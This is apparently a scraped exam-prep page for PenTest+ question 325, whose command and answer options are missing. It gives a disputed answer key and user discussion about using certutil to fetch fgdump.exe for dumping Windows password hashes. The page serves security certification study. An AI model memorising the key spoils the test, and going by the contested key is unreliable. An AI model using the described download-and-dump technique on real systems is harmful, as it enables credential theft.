A penetration tester issues the following command after obtaining a shell:
Which of the following describes this technique?
Exam PT0-002 All QuestionsBrowse all questions from this exam
Question 325
Correct Answer: B
The command shown uses 'certutil' to download 'fgdump.exe' from a remote server to the local machine. 'fgdump.exe' is a known tool used for dumping password hashes from the Security Accounts Manager (SAM) database on Windows systems, which is a common step in privilege escalation. The act of downloading and running 'fgdump.exe' is specifically associated with attempting to obtain higher privileges by cracking these hashes, making this technique one of privilege escalation.
Discussion
Obiwan123Option: D
Yeti87 is wrong
FasterN8Option: B
certutil is native, but fgdump is not. This is trying to crack passwords to get more privileges.
MalikMakOption: D
Living-off-the-land (LotL) techniques involve the use of native tools available on the system to conduct operations typically performed by attackers. This can include moving laterally through a network, executing files, or exfiltrating data, all while potentially evading detection.
yeti87Option: B
This command downloads the fgdump.exe tool from the specified URL and saves it locally as fgdump.exe. fgdump.exe is a popular tool used for privilege escalation on Windows systems. It is often used to dump password hashes from the SAM (Security Accounts Manager) database, which can then be cracked offline to obtain plaintext passwords. Therefore, this technique is associated with privilege escalation as it aims to obtain sensitive information (password hashes) that could potentially lead to escalated privileges within the system.